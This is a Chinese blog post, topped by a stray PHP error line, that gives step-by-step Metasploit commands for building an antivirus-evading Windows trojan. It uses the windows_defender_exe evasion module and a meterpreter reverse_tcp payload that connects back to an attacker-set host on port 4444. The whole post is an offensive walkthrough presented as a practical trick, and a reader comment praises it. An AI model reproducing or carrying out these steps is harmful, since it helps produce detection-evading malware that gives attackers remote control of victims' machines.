Warning: call_user_func_array() expects parameter 1 to be a valid callback, class 'BaiduLinkSeo_Plugin' does not have a method 'post' in /var/www/html/build/var/Typecho/Plugin.php on line 489
利用Metasploit制作免杀木马 - Miagz's blog

利用Metasploit制作免杀木马

由 Miagz 发布

前言

Metasploit 5.0的时候更新一个Evasion模块,这个模块能非常快捷的生成反杀毒软件的木马,注意!低于5.0以下的版本是没有Evasion模块的,所以需要手动更新Metasploit

Metasploit更新

如果是使用kail的同学就直接使用msfupdate就能进行更新,如果是使用别的系统的小伙伴就请进入到Metasploit目录下面的bin目录下面,运行msfupdate

利用

打开metasploit

查看evasion模块

这里我们选择第五个模块

use windows/windows_defender_exe

查看需要配置的参数

show options

可以看到只有一个文件名的参数可以配置,我们就修改为shell.exe吧

紧接着我们要配置回显payload

set payload windows/meterpreter/reverse_tcp
set lhost you-ip
set lport 4444

使用exploit或者run 执行

看到回显信息我们可以看到木马存放在/root/.msf4/local/下面
我们来检测一下免杀效果


仅有一条评论

  1. test1
    test1 · 2020-03-24 21:59

    很实用的小技巧,学到了

发表评论